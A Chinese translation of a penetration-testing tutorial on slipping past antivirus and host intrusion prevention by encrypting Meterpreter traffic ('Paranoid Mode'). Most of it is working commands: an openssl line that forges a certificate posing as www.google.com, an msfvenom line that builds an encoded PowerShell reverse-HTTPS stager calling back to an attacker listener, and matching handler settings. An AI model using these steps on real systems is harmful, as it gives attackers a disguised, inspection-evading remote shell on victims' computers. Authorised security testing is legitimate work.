回归最本质的信息安全

善用工具绕过杀毒软件和HIPS的流量检测

2017年9月26日发布

58,815
0
4

导语:如今大多数网络环境都包含各种安全软件,以防止主机受到攻击,如端点解决方案和主机入侵防御系统。终端解决方案会在主机存在的文件中扫描已知恶意软件,主机入侵防御系统(HIPS)会对每个数据包进行检测,然后断开所有不合法的连接。

如今大多数网络环境都包含各种安全软件,以防止主机受到攻击,如端点解决方案和主机入侵防御系统。终端解决方案会在主机存在的文件中扫描已知恶意软件,主机入侵防御系统(HIPS)会对每个数据包进行检测,然后断开所有不合法的连接。

即使这些安全产品提供了额外的安全层,但还不够。系统管理员经常依赖于这些控件,并允许用户执行脚本,从而导致执行任意代码并最终导致系统受损。

对于渗透测试来说,可以通过创建包含编码的Payload脚本来绕过这些控件,连接进行加密来躲避Hips的检测。HD Moore在2015年曾介绍使用Meterpreter Paranoid Mode作为一种安全连接的方法。

生成证书

OpenSSL可用于生成自定义证书。

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com"
-keyout www.google.com.key
-out www.google.com.crt &&
cat www.google.com.key www.google.com.crt > www.google.com.pem &&
rm -f www.google.com.key www.google.com.crt

或者Metasploit Framework有一个可以用来自动从信任源创建一个虚假证书的模块。

auxiliary/gather/impersonate_ssl

生成payload

Metasploit MsfVenom可用于生成编码的有效负载(PowerShell Base64),它将使用之前生成的证书。

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.100.3 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=/root/Desktop/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat

配置监听器

当配置监听器时,还需要使用两个附加选项。这是通知处理程序它将使用的证书(与Payload相同),并在接收到连接时执行SSL证书验证。

· HandlerSSLCert

· StagerVerifySSLCert

set payload windows/meterpreter/reverse_winhttps
set LHOST 192.168.100.3
set LPORT 443
set HandlerSSLCert /root/Desktop/www.google.com.pem
set StagerVerifySSLCert true

从目标主机上执行Patload起,打开一个加密的Meterpreter会话,它将不允许HIPS检查数据包并断开连接。

Meterpreter Paranoid Mode

使用Meterpreter Paranoid Mode工具可以完全自动完成上述过程。github可以找到使用这个工具的全部细节。

总结

上述过程经常被用于渗透测试中,可以躲避杀毒软件以及HIPS对流量的检测。

特别感谢James Hemmings以及Gabriel对本技术的贡献。

本文翻译自https://pentestlab.blog/2017/07/26/bypassing-antivirus-host-intrusion-prevention-systems/,如若转载,请注明原文地址: http://www.4hou.com/technology/7196.html

点赞 4
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

愣娃

愣娃

这个人很懒,什么也没留下

发私信

发表评论